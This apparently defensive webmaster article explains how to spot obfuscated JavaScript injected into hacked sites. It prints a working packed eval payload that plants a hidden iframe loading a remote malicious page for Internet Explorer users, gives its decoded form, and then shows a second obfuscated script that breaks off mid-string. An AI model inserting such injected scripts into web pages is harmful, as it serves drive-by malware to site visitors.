If the hackers are using script to hack your site it will be obfuscated to try and hide what the script is doing. This type of hack can be inserted in individual html/php pages on a site or into one of the javascript files. The bottom line is, if you see blocks of obfuscated script in one of your files be suspicious, check to make sure you know exactly what the script is doing. In the vast majority of hacks the obfuscated script is going to write either an iframe or a script call into the pages of the site. The [src="http://some.malicious.site/malicious.php"] will be a URL that loads the malicious content into the page.
Now a few examples of code I have seen on hacked sites.
Now a few examples of code I have seen on hacked sites.
<scriptg&t;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))
</script>
Which de-obfuscates to ->
function MakeFrameEx(){
element = document.get ElementById('yahoo_api');
if (!element){
var el = document.cr eateElement('iframe');
document.body.appendChild(el);
el.id = 'yahoo_api';
el.style.width = '1px';
el.style.height = '1px';
el.style.display = 'none';
el.src = 'hxxp://juyfdjhdjdgh.nl .ai/showthread.php?t=72241732'
}
}
var ua = navigator.userAgent.toLowerCase();
if (((ua.indexOf("msie") !=- 1 && ua.indexOf("opera") ==- 1 && ua.indexOf("webtv") ==- 1))
&& ua.indexOf("windows") !=- 1){
var t = setTimeout("MakeFrameEx()", 1000)
}
<script>date=new Date();var ar="Jp}g3ra]A\"kmTdQh{,'=Dyi)cf>1(0o[F
Always follow up with some basic security checks. Figuring out how the rats are getting into the barn is always tough. Most hosting services will help by checking access logs, looking at file ownership etc. so ask your hosting service for any information they can provide.